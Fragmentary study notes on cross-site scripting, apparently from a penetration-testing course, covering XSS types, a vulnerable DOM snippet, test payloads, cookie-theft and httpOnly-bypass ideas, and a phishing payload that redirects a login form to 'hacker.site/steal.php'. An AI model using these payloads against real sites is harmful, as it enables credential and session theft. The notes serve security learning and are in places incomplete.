1. Cross Site Scripting
2. Anatomy of an XSS Exploitation
3. The three types of XSS
4. Finding XSS
5. XSS Exploitation
6. Mitigation
***
1. Cross Site Scripting
- Input validation attacks include XSS, SQL injections, HTTP Header tampering
***
2. Anatomy of an XSS Exploitation
- Achieve
	1. Cookie stealing
	2. Getting complete control over a browser
	3. Initiating an exploitation phase against browser plugins first and then the machine
	4. Perform keylogging

For example, if the authenticated area of website Y is auth.y.com, the domain in the cookie will most likely be set to auth.y.com and he will have to find an XSS in that same subdomain.
***
3. The three types of XSS
- Reflected XSS
- Stored XSS "persistent" : Server side , stored within the web application.
- DOM XSS : js client-side code
	- test.html?name=Armando
	```
	<script>
		var pos = document.URL.indexOf("name=")+5;
		document.write(document.URL.substring(pos,document.URL.length)); 
	</script>

	```
***
4. Finding XSS
- GET : including a payload in a crafted link, if the victim happens to click on this link
- POST : is used for forms submission therefore, exploiting it requires both some tricks
- test <>
- Simple payload : `<plaintext>`  : web page source as plain text
***
5. XSS Exploitation
- `onload="javascript:alert('XSS Example')`
- avoid using single quotes : " onload="alert(String.fromCharCode(88,83,83))
- payload working under Firefox may not work for Internet Explorer or Safari and vice versa. Browsers are software that interpret the HTML received by the web server according to their internal rules.

- hacker can achieve :
	1. Cookie stealing
	2. Defacement
	3. Phishing / Malware
	4. XSS Worms

- cookies carry on parameters from an HTTP server to its clients and vice-versa.
- The SOP prevents cookie stealing

1. Bob logs in on http://alice.xxx
2. ttp://alice.xxx returns a Session Cookie to Bob’s web browser
3. Bob visits http://alice.xxx/shopping
4. Since Bob’s web browser has a Cookie set for alice.xxx, any subsequent request

- sessionID can be seen as the primary key for a set of variables 
   (in form of parameter< - >value) stored on the server and belonging to a user.
- added the parameter `Authenticated` on purpose: it lets the website understand whether the user is authenticated (logged in) or not.
- bypass the httpOnly security feature through XST (Cross site tracing) and Ajax.
- cookie is issued with the parameter path=/ it is valid for all the directories of the domains
***
1. Cookie stealing
- bypass the path limitation in cookie.
	1.  Access to the DOM page 123 
	- Two Firefox extensions may help a lot in testing how the Cookies mechanism works:
		- Live HTTP Header
		- Cookie Editor
		- more info 116 - 127
	- httpOnly : prevents cookies from being read by JavaScript
	- secure : cookies are sent only if https (SSL) is used in the request
	2. Example if Cookie have specific subdomain page 130 - 139 : attacker srver
***
2. Defacement
`document.body.innerHTML=" Defaced";`

3. Phishing / Malware
```
<form name="loginform" method="POST" action="/checklogin.cgi">
document.forms[0].action="https://hacker.site/steal.php";
```

- Once an XSS vulnerability is found, BeEF is the fastest way to exploit it and gain control of the remote browser.
***
Mitigating

- Input validation
- Context-aware output encoding
***